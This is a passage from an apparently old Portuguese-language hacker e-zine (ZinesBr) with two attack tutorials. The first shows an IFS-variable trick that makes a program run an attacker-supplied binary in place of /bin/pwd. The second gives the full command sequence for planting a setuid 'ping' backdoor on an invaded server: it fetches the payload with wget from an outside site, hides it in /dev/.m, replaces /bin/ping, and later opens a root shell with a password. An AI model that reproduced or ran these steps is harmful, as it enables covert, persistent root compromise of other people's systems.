==[ Por Gotoxy                      ]==

Em nossa segunda parte da 'Tecnica do Burlamento', vamos aprender
a enganar o sistema atraves da variavel IFS. Abaixo temos um ex.
de um programa:

-------------------------- exemplo.c  --------------------------

#include <stdio.h>
#include <stdlib.h>

main(){
  printf("Voce esta no diretorio: \n");
  system("/bin/pwd");
}
----------------------------------------------------------------

[root@darkstar /tmp]# gcc -o exemplo exemplo.c

Como usuario normal:

[gotoxy@darkstar /tmp]$ ./exemplo
Voce esta no diretorio:
/
[gotoxy@darkstar /tmp]$ cat > bin.c

#include <stdio.h>
main(){
printf("g0t0xY\n");
}
[Ctrl] + D

[gotoxy@darkstar tmp]$ gcc bin.c -o bin
[gotoxy@darkstar tmp]$ ./exemplo
Voce esta no diretorio:
/
[gotoxy@darkstar /tmp]$ export IFS=/
[gotoxy@darkstar /tmp]$ PATH=/tmp
[gotoxy@darkstar /tmp]$ ./exemplo
g0t0xy
[gotoxy@darkstar /tmp]$

Vou deixar as coisas mais claras para voces...Visualize o programa
exemplo.c lah em cima bem atentamente. Apos  exportamos a variavel
IFS e a setarmos para "/", o programa exemplo.c foi "modificado" e
ficou assim depois:


-------------------------- exemplo.c  --------------------------

#include <stdio.h>
#include <stdlib.h>

main(){
  printf("Voce esta no diretorio: \n");
  system("bin pwd");
}
----------------------------------------------------------------

Se tivermos um programa cujo nome eh bin, ele seria executado.
Por isso que o nosso programa 'bin' foi executado.E ao invez
de termos feito akele simples programa (bin.c), poderiamos ter
colocado um codigo mais malicioso, como trojans horses, backdoors
ou ateh mesmo virus ou worms.

Como voces podem observar,a variavel IFS eliminou as "/" (barras)
e assim o que era para executar: /bin/pwd, executou: bin pwd 
E por isso nos, novamente, conseguimos burlar o sistema! :)

Obs: Isso funciona apenas em versoes do bash mais antigas.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [12]
==[ Backdoors - Parte 2 ]==
==[ Por Gotoxy          ]==

Eae,
voce vai aprender agora como instalar a backdoor do PING. Nao eh nada
complicado,basta apenas ter o programa (ping.zip) q vem anexado junto 
ao zine e instala-lo corretamente no servidor invadido.Suponhamos que
o servidor invadido seja o  hostalvo.org, portanto fariamos o esquema
abaixo para instalar a backdoor do Ping:

[root@localhost /root]# telnet hostalvo.org
Login: root
Password: 

   Welcome r00t!

bash:~# mkdir /dev/.m     
bash:~# cd /dev/.m
bash:~# wget -q http://zinesbr.hpg.com.br/ping.zip
bash:~# unzip ping.zip
bash:~# make
bash:~# chmod +xs ping
bash:~# mv ping /bin/ping
bash:~# chmod +s /bin/ping
bash:~# ping
usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
bash:~# exit

   E pronto! O Ping Backdoor esta instalado!

   Agora sempre que voce quiser root no servidor, basta entrar como
usuario normal e...:

hostalvo.org:~$ ping
usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
[-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
hostalvo.org:~$ ping -b

Enter option:zinesbr

Argument: bash
bash:~#

E pronto! Agora sempre que voce entrar como usuario normal poderah
se tornar r00t!:) Akele "zinesbr" foi uma senha definida no ping.c
e que pode ser alterada. Como pode observar, eu  deixei o ping.zip
no diretorio /dev/.m, pois temos que esconder o maximo possivel as
backdoors que desejamos instalar no servidor invadido. O  ping.zip
esta anexado junto ao zine para  voce downloada-lo para o servidor
atraves do servico de ftp (caso ele esteja habilitado no hostalvo)
e tambem deixei ele no servidor do zinesbr para voce poder fazer o 
download atraves do wget (ou outro aplicativo).

flwz!

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [13]
==[ Ultimas palavras ]==
==[ Por Gotoxy       ]==

  Infelizmente chegamos ao final do nosso zine03 (snif..snif)
Agora que chegaram as aulas,novas edicoes do zinesbr poderao 
demorar um pouco mais para ser lancado. Mas nao se preocupe, 
vamos sempre lancar novas edicoes do zinesbr, basta apenas 
esperar!:) 
  Ah! E p/ as edicoes serem lancadas mais rapidamente,preciso 
de ajuda, pois ninguem manda materia para ajudar no zinesbr e 
aih fica muito dificil para mim ( tadinho...)
  Portanto, se alguem poder ajudar com materias, por favor,
ajude!:)

Ate a proxima Edicao !
________________________________________________________________________
------------------------------------ZinesBr-----------------------------

                          Perguntas? Duvidas? Sugestoes? 
                                zinesbr@ieg.com.br       
						      
                                   Home Page
                            http://zinesbr.hpg.com.br

  					      
                                6666666666666                    
          6666                66666666666666666            6666  
        6666666              6666666666666666666          6666666
        666666666           666666666666666666666       666666666
             66666666       666666666666666666666    6666666     
                666666      666     66666     666  66666         
                    666666  66   6   666   6   66 666            
                       6666 666     66666     666 6              
                          66 666666666 666666666 66              
           -[ ZinesBR ]-        6666     6666         -[ ZinesBR ]-                    
                              66 66666666666 66                  
          66666         666666 66           66 666666         666
          666666    66666666   666         666   66666666    6666
           6666666666666        66666   66666        66666666666 
             66666666            66666666666            6666666  
            666666                 6666666                666666 
             6666                                          6666                             
